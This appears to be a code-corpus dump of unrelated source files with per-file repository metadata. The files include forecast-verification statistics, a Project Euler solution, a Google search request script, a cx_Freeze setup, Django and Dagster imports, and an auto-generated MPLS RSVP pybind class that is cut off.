#print('brier skill:', brier_skill.mean().values)
reliability_diagram = np.array(reliability_diagram).T
roc_diagram = np.array(roc_diagram).T
auc = auc_calc(roc_diagram[0], roc_diagram[1])
roc_ss = 2 * (auc - 0.5)
print(auc, roc_ss)
# plt.figure(facecolor='w')
# plt.plot(roc_diagram[0], roc_diagram[1], 'k-^')
# plt.xlim([0, 1])
# plt.ylim([0, 1])
# for x, y, s in zip(roc_diagram[0], roc_diagram[1], roc_diagram[2]):
# plt.text(x, y, s)
# plt.title('%s %s %s'%(cwa, _fhr, thresh))
# plt.xlabel('False Alarm Rate')
# plt.ylabel('Hit Rate')
# plt.plot(np.arange(0, 1.1, .1), np.arange(0, 1.1, .1), 'k--', linewidth=0.5)
# plt.grid()
# plt.show()
far = xr.DataArray(roc_diagram[0], dims={'center':roc_diagram[2]}, coords={'center':roc_diagram[2]})#, name='false_alarm_rate'),
hr = xr.DataArray(roc_diagram[1], dims={'center':roc_diagram[2]}, coords={'center':roc_diagram[2]})#, name='hit_rate')
data_merge = xr.merge([brier_skill])
data_merge['n_events'] = observed_yes
data_merge['hit_rate'] = hr
data_merge['false_alarm_rate'] = far
# data_merge['auc'] = auc
# data_merge['roc'] = roc_ss
print(data_merge)
data.append(data_merge)
return xr.concat(data, dim='thresh')
verif_stats = extract_pqpf_verif_stats(48, urma) | 39.797794 | 136 | 0.575612 | 1,403 | 10,825 | 4.176764 | 0.116892 | 0.047782 | 0.056314 | 0.034812 | 0.867235 | 0.846416 | 0.827645 | 0.807509 | 0.790785 | 0.769625 | 0 | 0.021395 | 0.283233 | 10,825 | 272 | 137 | 39.797794 | 0.733857 | 0.121848 | 0 | 0.897436 | 0 | 0 | 0.047397 | 0.005925 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012821 | false | 0 | 0.019231 | 0 | 0.044872 | 0.038462 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
14d6a47d681f6f067d460a71c45ac06c141a9e87 | 2,549 | py | Python | euler-008.py | jwnichols3/euler | 7a86216c96ca28216fc2ef63b3bbfc5648cb3dc9 | [
"MIT"
] | null | null | null | euler-008.py | jwnichols3/euler | 7a86216c96ca28216fc2ef63b3bbfc5648cb3dc9 | [
"MIT"
] | null | null | null | euler-008.py | jwnichols3/euler | 7a86216c96ca28216fc2ef63b3bbfc5648cb3dc9 | [
"MIT"
] | null | null | null | """
Euler 008
The four adjacent digits in the 1000-digit number that have the greatest product are 9 × 9 × 8 × 9 = 5832.
73167176531330624919225119674426574742355349194934
96983520312774506326239578318016984801869478851843
85861560789112949495459501737958331952853208805511
12540698747158523863050715693290963295227443043557
66896648950445244523161731856403098711121722383113
62229893423380308135336276614282806444486645238749
30358907296290491560440772390713810515859307960866
70172427121883998797908792274921901699720888093776
65727333001053367881220235421809751254540594752243
52584907711670556013604839586446706324415722155397
53697817977846174064955149290862569321978468622482
83972241375657056057490261407972968652414535100474
82166370484403199890008895243450658541227588666881
16427171479924442928230863465674813919123162824586
17866458359124566529476545682848912883142607690042
24219022671055626321111109370544217506941658960408
07198403850962455444362981230987879927244284909188
84580156166097919133875499200524063689912560717606
05886116467109405077541002256983155200055935729725
71636269561882670428252483600823257530420752963450
Find the thirteen adjacent digits in the 1000-digit number that have the greatest product. What is the value of this product?
"""
s = "7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450"
largestProduct = 0
consecutive = 13
for i in range(0, len(s) - consecutive):
product = 1
for j in range(i, i + consecutive):
product *= int(s[j: j + 1])
if product > largestProduct:
largestProduct = product
print (largestProduct) | 59.27907 | 1,006 | 0.923107 | 103 | 2,549 | 22.873786 | 0.592233 | 0.011885 | 0.013582 | 0.016129 | 0.050934 | 0.050934 | 0.050934 | 0.050934 | 0.050934 | 0.050934 | 0 | 0.844102 | 0.058847 | 2,549 | 43 | 1,007 | 59.27907 | 0.136724 | 0.495881 | 0 | 0 | 0 | 0 | 0.783085 | 0.783085 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.1 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
14e99718b692526344a6c812d68d72fb84010dda | 900 | py | Python | AI 이노베이션 스퀘어 언어지능 과정/20190430/Day02 HTTP, URLlib, Request05.py | donddog/AI_Innovation_Square_Codes | a04d50db011d25e00d8486146c24124c50242aa7 | [
"MIT"
] | 1 | 2021-02-11T16:45:21.000Z | 2021-02-11T16:45:21.000Z | AI 이노베이션 스퀘어 언어지능 과정/20190430/Day02 HTTP, URLlib, Request05.py | donddog/AI_Innovation_Square_Codes | a04d50db011d25e00d8486146c24124c50242aa7 | [
"MIT"
] | null | null | null | AI 이노베이션 스퀘어 언어지능 과정/20190430/Day02 HTTP, URLlib, Request05.py | donddog/AI_Innovation_Square_Codes | a04d50db011d25e00d8486146c24124c50242aa7 | [
"MIT"
] | null | null | null | <<<<<<< HEAD
#resp = response
import requests
header = {"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36"}
resp = requests.get("https://www.google.com/search", params={"q":"박보영"}, headers = header)
print(resp.status_code)
print(resp.reason)
print(resp.headers)
print(resp.content)
print(resp.encoding)
resp.encoding = "utf-8"
print(resp.text)
=======
#resp = response
import requests
header = {"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36"}
resp = requests.get("https://www.google.com/search", params={"q":"박보영"}, headers = header)
print(resp.status_code)
print(resp.reason)
print(resp.headers)
print(resp.content)
print(resp.encoding)
resp.encoding = "utf-8"
print(resp.text)
>>>>>>> 125e15a4c5fcf711dd279c9b18e149867466699e
| 28.125 | 142 | 0.717778 | 134 | 900 | 4.80597 | 0.350746 | 0.167702 | 0.055901 | 0.080745 | 0.931677 | 0.931677 | 0.931677 | 0.931677 | 0.931677 | 0.931677 | 0 | 0.107711 | 0.092222 | 900 | 31 | 143 | 29.032258 | 0.680539 | 0.033333 | 0 | 0.869565 | 0 | 0.086957 | 0.375576 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.086957 | null | null | 0.521739 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 9 |
090f2f5a590909ff7d3be215de90352f65501415 | 1,647 | py | Python | lidar_download/setup.py | NicoRio42/mapant-scripts | 24453f342fc52065913c8a658fd6898d18408c5e | [
"MIT"
] | 1 | 2022-01-07T08:33:00.000Z | 2022-01-07T08:33:00.000Z | lidar_download/setup.py | NicoRio42/mapant-scripts | 24453f342fc52065913c8a658fd6898d18408c5e | [
"MIT"
] | null | null | null | lidar_download/setup.py | NicoRio42/mapant-scripts | 24453f342fc52065913c8a658fd6898d18408c5e | [
"MIT"
] | null | null | null | import sys
from cx_Freeze import setup, Executable
includefiles = [
"lidar_download_settings.json",
"parts\parts_tiles\part_1.geojson",
"parts\parts_tiles\part_2.geojson",
"parts\parts_tiles\part_3.geojson",
"parts\parts_tiles\part_4.geojson",
"parts\parts_tiles\part_5.geojson",
"parts\parts_tiles\part_6.geojson",
"parts\parts_tiles_overlap\part_1_overlap.geojson",
"parts\parts_tiles_overlap\part_2_overlap.geojson",
"parts\parts_tiles_overlap\part_3_overlap.geojson",
"parts\parts_tiles_overlap\part_4_overlap.geojson",
"parts\parts_tiles_overlap\part_5_overlap.geojson",
"parts\parts_tiles_overlap\part_6_overlap.geojson",
]
includes = []
excludes = ["Tkinter"]
setup(
name="lidar_download",
version="0.1",
description="To download lidar files from ftp server",
options={
"build_exe": {
"includes": includes,
"excludes": excludes,
"include_files": includefiles,
}
},
executables=[Executable("lidar_download.py", base=None)],
)
"""
'parts\parts_tiles\part_1.geojson',
'parts\parts_tiles\part_2.geojson',
'parts\parts_tiles\part_3.geojson',
'parts\parts_tiles\part_4.geojson',
'parts\parts_tiles\part_5.geojson',
'parts\parts_tiles\part_6.geojson',
'parts\parts_tiles_overlap\part_1_overlap.geojson',
'parts\parts_tiles_overlap\part_2_overlap.geojson',
'parts\parts_tiles_overlap\part_3_overlap.geojson',
'parts\parts_tiles_overlap\part_4_overlap.geojson',
'parts\parts_tiles_overlap\part_5_overlap.geojson',
'parts\parts_tiles_overlap\part_6_overlap.geojson',
"""
| 32.94 | 61 | 0.720704 | 216 | 1,647 | 5.12963 | 0.194444 | 0.216607 | 0.32491 | 0.436823 | 0.736462 | 0.736462 | 0.736462 | 0.736462 | 0.736462 | 0.736462 | 0 | 0.018571 | 0.14997 | 1,647 | 49 | 62 | 33.612245 | 0.772857 | 0 | 0 | 0 | 0 | 0 | 0.588346 | 0.477444 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.0625 | 0 | 0.0625 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
1187f6eac2b1104c1ce281439938d657fd0ec30f | 181 | py | Python | web_interface/shell_imports.py | omegacore/ease | 38a6ff065beaaaaa1b025f0a0f9e80f0f553cac0 | [
"BSD-3-Clause-LBNL"
] | 7 | 2017-07-03T19:32:29.000Z | 2021-07-27T11:48:28.000Z | web_interface/shell_imports.py | omegacore/ease | 38a6ff065beaaaaa1b025f0a0f9e80f0f553cac0 | [
"BSD-3-Clause-LBNL"
] | 38 | 2017-07-26T18:54:17.000Z | 2018-05-31T02:29:16.000Z | web_interface/shell_imports.py | omegacore/ease | 38a6ff065beaaaaa1b025f0a0f9e80f0f553cac0 | [
"BSD-3-Clause-LBNL"
] | 7 | 2017-06-26T23:35:13.000Z | 2020-12-13T00:35:17.000Z | from account_mgr_app.models import *
from alert_config_app.models import *
from django.contrib.auth.models import User
'''
use this document to run the imports in django shell.
''' | 25.857143 | 53 | 0.790055 | 29 | 181 | 4.793103 | 0.724138 | 0.258993 | 0.215827 | 0.273381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.132597 | 181 | 7 | 54 | 25.857143 | 0.88535 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
11c1d1a54dcb5b60f8c9e069f73b721a4b25c249 | 87 | py | Python | twitter_text/regexp/directional_markers_group.py | s51517765/twitter-text-python | 4c07d616344f0037a8aa6317bb439b91fa83ed71 | [
"MIT"
] | 15 | 2020-05-23T15:41:13.000Z | 2022-02-27T20:25:35.000Z | twitter_text/regexp/directional_markers_group.py | s51517765/twitter-text-python | 4c07d616344f0037a8aa6317bb439b91fa83ed71 | [
"MIT"
] | 4 | 2020-01-25T12:01:39.000Z | 2020-05-24T03:35:08.000Z | twitter_text/regexp/directional_markers_group.py | s51517765/twitter-text-python | 4c07d616344f0037a8aa6317bb439b91fa83ed71 | [
"MIT"
] | 2 | 2020-01-25T11:47:47.000Z | 2021-08-29T10:55:09.000Z | directional_markers_group = r'\u202A-\u202E\u061C\u200E\u200F\u2066\u2067\u2068\u2069'
| 43.5 | 86 | 0.816092 | 13 | 87 | 5.307692 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.369048 | 0.034483 | 87 | 1 | 87 | 87 | 0.452381 | 0 | 0 | 0 | 0 | 0 | 0.632184 | 0.632184 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ee92b7e999169e6dd57ac574bfd29f8eb6e3146c | 151 | py | Python | dagster_azure_key_vault/dagster_azure_key_vault/__init__.py | Martin-Carlsson/Dagster-AzureKeyVault | 3bcb9a7ccc09118f02faee839f7b97ad56073c3a | [
"Apache-2.0"
] | 2 | 2022-02-15T23:38:23.000Z | 2022-02-16T08:31:13.000Z | dagster_azure_key_vault/dagster_azure_key_vault/__init__.py | Martin-Carlsson/Dagster-AzureKeyVault | 3bcb9a7ccc09118f02faee839f7b97ad56073c3a | [
"Apache-2.0"
] | null | null | null | dagster_azure_key_vault/dagster_azure_key_vault/__init__.py | Martin-Carlsson/Dagster-AzureKeyVault | 3bcb9a7ccc09118f02faee839f7b97ad56073c3a | [
"Apache-2.0"
] | 1 | 2022-02-09T15:53:59.000Z | 2022-02-09T15:53:59.000Z | """init file helping dagit open the right repo"""
from dagster_azure_key_vault.repositories.azure_key_vault_repo import (
azure_key_vault_repo,
)
| 25.166667 | 71 | 0.801325 | 23 | 151 | 4.869565 | 0.652174 | 0.214286 | 0.348214 | 0.303571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125828 | 151 | 5 | 72 | 30.2 | 0.848485 | 0.284768 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
ee946a60e543d27580c31943b1f54d43fdeb5d63 | 67,604 | py | Python | pybind/slxos/v16r_1_00b/brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/slxos/v16r_1_00b/brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/slxos/v16r_1_00b/brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | 1 | 2021-11-05T22:15:42.000Z | 2021-11-05T22:15:42.000Z |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import g_mpls_prot_statistics_pkt_types
import g_mpls_prot_statistics_errors
class show_mpls_rsvp_interface_detail(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-mpls - based on the path /brocade_mpls_rpc/show-mpls-rsvp-interface-one-interface/output/mpls-rsvp-interface-detail/show-mpls-rsvp-interface-detail. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__mpls_rsvp_interface_hello_interval','__mpls_rsvp_interface_hello_tolerance','__mpls_rsvp_interface_hello_status','__mpls_rsvp_interface_te_up_thresholds','__mpls_rsvp_interface_te_down_thresholds','__g_mpls_prot_statistics_pkt_types','__g_mpls_prot_statistics_errors','__mpls_rsvp_interface_active_backup_outsegs','__mpls_rsvp_interface_inactive_backup_outsegs','__mpls_rsvp_interface_duplicate_preempts_dropped','__mpls_rsvp_interface_p2mp_capability','__mpls_rsvp_interface_bypass_interface','__mpls_rsvp_interface_tunnel_name','__mpls_rsvp_interface_bypass_tunnel_interface_name','__mpls_rsvp_interface_bypass_creation_time','__mpls_rsvp_interface_bypass_creation_location','__mpls_rsvp_interface_assoc_bypass_LSPs',)
_yang_name = 'show-mpls-rsvp-interface-detail'
_rest_name = 'show-mpls-rsvp-interface-detail'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__mpls_rsvp_interface_inactive_backup_outsegs = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-inactive-backup-outsegs", rest_name="mpls-rsvp-interface-inactive-backup-outsegs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__mpls_rsvp_interface_p2mp_capability = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mpls-rsvp-interface-p2mp-capability", rest_name="mpls-rsvp-interface-p2mp-capability", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__mpls_rsvp_interface_active_backup_outsegs = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-active-backup-outsegs", rest_name="mpls-rsvp-interface-active-backup-outsegs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__mpls_rsvp_interface_te_up_thresholds = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)), is_leaf=False, yang_name="mpls-rsvp-interface-te-up-thresholds", rest_name="mpls-rsvp-interface-te-up-thresholds", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__mpls_rsvp_interface_te_down_thresholds = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)), is_leaf=False, yang_name="mpls-rsvp-interface-te-down-thresholds", rest_name="mpls-rsvp-interface-te-down-thresholds", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__g_mpls_prot_statistics_errors = YANGDynClass(base=YANGListType(False,g_mpls_prot_statistics_errors.g_mpls_prot_statistics_errors, yang_name="g_mpls_prot_statistics_errors", rest_name="g_mpls_prot_statistics_errors", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='False', extensions=None), is_container='list', yang_name="g_mpls_prot_statistics_errors", rest_name="g_mpls_prot_statistics_errors", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, extensions=None, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='list', is_config=True)
self.__mpls_rsvp_interface_duplicate_preempts_dropped = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-duplicate-preempts-dropped", rest_name="mpls-rsvp-interface-duplicate-preempts-dropped", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__mpls_rsvp_interface_hello_tolerance = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-hello-tolerance", rest_name="mpls-rsvp-interface-hello-tolerance", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__mpls_rsvp_interface_tunnel_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-tunnel-name", rest_name="mpls-rsvp-interface-tunnel-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__mpls_rsvp_interface_assoc_bypass_LSPs = YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-assoc-bypass-LSPs", rest_name="mpls-rsvp-interface-assoc-bypass-LSPs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__mpls_rsvp_interface_hello_status = YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-hello-status", rest_name="mpls-rsvp-interface-hello-status", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__mpls_rsvp_interface_bypass_tunnel_interface_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-bypass-tunnel-interface-name", rest_name="mpls-rsvp-interface-bypass-tunnel-interface-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__mpls_rsvp_interface_bypass_creation_time = YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-bypass-creation-time", rest_name="mpls-rsvp-interface-bypass-creation-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__mpls_rsvp_interface_hello_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-hello-interval", rest_name="mpls-rsvp-interface-hello-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__mpls_rsvp_interface_bypass_interface = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mpls-rsvp-interface-bypass-interface", rest_name="mpls-rsvp-interface-bypass-interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__g_mpls_prot_statistics_pkt_types = YANGDynClass(base=YANGListType(False,g_mpls_prot_statistics_pkt_types.g_mpls_prot_statistics_pkt_types, yang_name="g_mpls_prot_statistics_pkt_types", rest_name="g_mpls_prot_statistics_pkt_types", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='False', extensions=None), is_container='list', yang_name="g_mpls_prot_statistics_pkt_types", rest_name="g_mpls_prot_statistics_pkt_types", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, extensions=None, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='list', is_config=True)
self.__mpls_rsvp_interface_bypass_creation_location = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-bypass-creation-location", rest_name="mpls-rsvp-interface-bypass-creation-location", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'brocade_mpls_rpc', u'show-mpls-rsvp-interface-one-interface', u'output', u'mpls-rsvp-interface-detail', u'show-mpls-rsvp-interface-detail']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'show-mpls-rsvp-interface-one-interface', u'output', u'mpls-rsvp-interface-detail', u'show-mpls-rsvp-interface-detail']
def _get_mpls_rsvp_interface_hello_interval(self):
"""
Getter method for mpls_rsvp_interface_hello_interval, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_hello_interval (uint32)
YANG Description: RSVP Hello interval for the RSVP Interface
"""
return self.__mpls_rsvp_interface_hello_interval
def _set_mpls_rsvp_interface_hello_interval(self, v, load=False):
"""
Setter method for mpls_rsvp_interface_hello_interval, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_hello_interval (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_hello_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mpls_rsvp_interface_hello_interval() directly.
YANG Description: RSVP Hello interval for the RSVP Interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-hello-interval", rest_name="mpls-rsvp-interface-hello-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_hello_interval must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-hello-interval", rest_name="mpls-rsvp-interface-hello-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__mpls_rsvp_interface_hello_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_hello_interval(self):
